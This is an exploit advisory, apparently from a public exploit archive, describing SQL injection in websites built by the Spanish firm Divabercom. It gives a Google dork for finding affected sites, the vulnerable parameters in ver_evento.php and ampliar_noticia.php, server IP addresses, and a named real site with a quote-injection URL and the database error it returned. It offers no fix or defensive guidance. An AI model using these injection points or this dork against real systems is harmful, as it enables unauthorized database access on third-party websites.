Divabercom Almeria Spain Web Design SQL Injection

1. #########################################################
2.  
3. # Exploit Title : Divabercom Almeria Spain Web Design SQL Injection
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 11/01/2019
7. # Vendor Homepage : divabercom.com
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Google Dorks : intext:''Diseñado y desarrollado por Divabercom''
12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
13. Special Elements used in an SQL Command ('SQL Injection') ]
14.  
15. #########################################################
16.  
17. # SQL Injection Exploit :
18. ***********************
19.  
20. /ver_evento.php?id=[ID-NUMBER]&t=[YEAR]-[ANOTHER-YEAR-HERE][SQL Injection]
21.  
22. /ampliar_noticia.php?id=[SQL Injection]
23.  
24. #########################################################
25.  
26. # Example Vulnerable Site :
27. *************************
28.  
29. Note => (86.109.162.135) => There are 337 domains hosted on this server.
30.  
31. Note => (86.109.162.236) => There are 159 domains hosted on this server.
32.  
33. [+] afvpa.com/ver_evento.php?id=3&t=2018-2019%27 =>
34.  
35. [ Proof of Concept ] => archive.fo/waDTO
36.  
37. #########################################################
38.  
39. # SQL Database Error :
40. **********************
41. You have an error in your SQL syntax; check the manual
42. that corresponds to your MySQL server version for
43. the right syntax to use near ''2018-2019''' at line 1
44.  
45. #########################################################
46.  
47. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
48.  
49. #########################################################